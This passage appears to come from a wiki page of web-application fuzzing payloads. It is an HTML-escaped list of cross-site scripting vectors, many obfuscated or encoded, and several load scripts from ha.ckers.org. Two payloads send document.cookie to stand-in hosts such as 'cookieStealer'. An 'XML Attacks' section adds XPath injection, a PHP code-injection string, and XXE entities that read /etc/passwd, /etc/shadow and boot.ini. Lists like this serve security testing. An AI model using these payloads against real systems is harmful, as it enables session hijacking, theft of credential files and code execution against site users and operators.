&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
